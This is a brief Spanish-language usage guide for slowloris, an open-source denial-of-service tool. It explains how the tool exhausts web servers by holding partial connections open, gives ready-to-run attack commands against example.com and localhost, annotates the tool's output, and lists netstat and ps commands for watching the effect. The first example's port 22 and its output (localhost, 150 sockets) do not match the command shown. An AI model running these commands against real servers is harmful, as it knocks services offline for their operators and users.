Herramienta de código abierto para realizar ataques de denegación de servicio (DoS) en servidores web. slowloris explota una vulnerabilidad en los servidores web llamada "Keep-Alive" para agotar los recursos del servidor y hacerlos inaccesibles. Funciona abriendo conexiones parciales pero nunca las completa, como el servidor espera que se completen, mantiene esos sockets abiertos consumiendo memoria y recursos agotandolos en el servidor. Este proceso no genera tráfico masivo, no consume ancho de banda y no hace que el CPU se dispare, simplemente ocupa conexiones que el servidor no puede cerrar.
$ slowloris -v -p 22 -s 200 example.com
Algunas notas sobre la salida del comando:
Attacking localhost with 150 sockets. --> Conexiones iniciales
Creating sockets --> Abriendo conexiones
Sending keep-alive headers --> Manteniendo vivas las conexiones
Socket count: 150 --> Número de conexiones activas
Sending keep-alive headers --> Refrescando conexiones cada 15s
Creating 35 new sockets --> Reemplazando conexiones que murieron y ajustando para mantener el número objetivo
$ netstat -an | grep :80 | grep -c ESTABLISHED
$ netstat -an | grep :80 | wc -l
$ ps aux | grep apache2 | wc -l
$ ps aux | grep nginx | wc -l
$ slowloris -p 80 -s 5000 localhost